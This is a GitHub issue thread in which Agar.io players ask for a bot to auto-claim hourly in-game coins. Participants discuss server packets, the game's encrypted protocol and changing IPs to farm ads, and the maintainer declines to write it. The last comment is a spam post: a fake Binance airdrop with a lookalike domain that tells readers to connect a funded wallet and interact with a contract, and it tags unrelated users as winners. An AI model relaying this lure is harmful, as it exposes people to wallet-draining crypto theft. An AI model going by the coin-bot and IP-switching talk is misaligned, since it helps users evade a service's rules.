### ISSUE TITLE
A request.

### ISSUE THREAD

**Issue by jerzabek** [Cr4xy/agar-lvlgen#79]
First of I wanna say tha its not @Cr4xy 's fault for us getting banned. He made this and he did a good job at it, the fact that miniclip banned us for using it is just a sad coincidence, after all theyre doing a decent job at fixing bots, you have to admit. 

**The request!**
Could you make a program that just collects the free coins you get every hour? I am pretty sure that they wont be able to really recognize it as a 'bot like' program, so in theory it shouldn't get anyone banned. And also it would be pretty damn usefull.
Thanks

**Comment by clairekardas** [comment]
Auto clicker :)

**Comment by 007Unknown** [comment]
@christopherkardas yeah.
@JarzaGM This is bullshit... they ban who used agar-lvlgen but who's in ABP/ABR or use bots.. they doesnt.. Why? They level up really faster.. If you see some livestreams like zerthek he leveled up to level100 quickly with his "fans" donating to his paypal to get bots... in their stream.. pfff #this_is_a_joke_with_us

**Comment by jerzabek** [comment]
@hugonsantos ik but what u gunna do, the world is cruel

**Comment by clairekardas** [comment]
When you want an free coins bot, you must ask in the agar client repro ^-^

**Comment by makandz** [comment]
This is not supported on agario-client as I said many times. The coins system goes through a completely different server that we don't go through. Until someone can make something to connect and send packets to that server, we can't do anything.

**Comment by Cr4xy** [comment]
> The coins system goes through a completely different server that we don't go through

Many people think so, but it's actually not true. You send the request to the server you're currently playing on. If you know what to send the server in order to get the hourly coins, you can just say `myClient.send(buf)`, and you're done. :+1:

**Comment by makandz** [comment]
> If you know what to send

hehe.

**Comment by jacobduba** [comment]
no thats illegal - people pay big money to have their ads displayed in Agar.io.

**Comment by Cr4xy** [comment]
> no thats illegal - people pay big money to have their ads displayed in Agar.io.

We are not talking about the ads, rather the hourly coins.

**Comment by jacobduba** [comment]
oh... that's better.

**Comment by jacobduba** [comment]
from the looks of it the whole menu is done through a canvas element, which means javascript.

Its in a div using open-fl.

**Comment by makandz** [comment]
Yes, but agar-lvlgen doesn't run through the website..

**Comment by jacobduba** [comment]
but its a way to find out "what to send"

**Comment by Cr4xy** [comment]
Yes @MooShoe, but i don't know if i should code it in.

**Comment by jerzabek** [comment]
If you can try and make it self standing (without levelgen), and I would try it on the account I've made as a backup lol.
Ofcourse if you want to tho.

**Comment by jacobduba** [comment]
im imagining this being more of a userscript. I don't want to set up a server just for this.

**Comment by beaaan** [comment]
@Cr4xy can we do a script or a js to auto claim coins hours?

**Comment by 007Unknown** [comment]
@bean07 
I dont know _anything_ about js, btw you can do some "hack" 
Watching ads changing your IP _OBS: YOU MIGHT LOSE YOUR ACC DOING THIS_

**Comment by beaaan** [comment]
;V

**Comment by Cr4xy** [comment]
@bean07 Yes, however I'm not gonna do it, because they encrypt the protocol and I'm not gonna spend hours/days/weeks trying to disassemble the LLVM code, sorry.

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @arden, @ndhao164, @DNROO, @olivierwilkinson, @7AC0B95, @dariotarantini, @correajfc
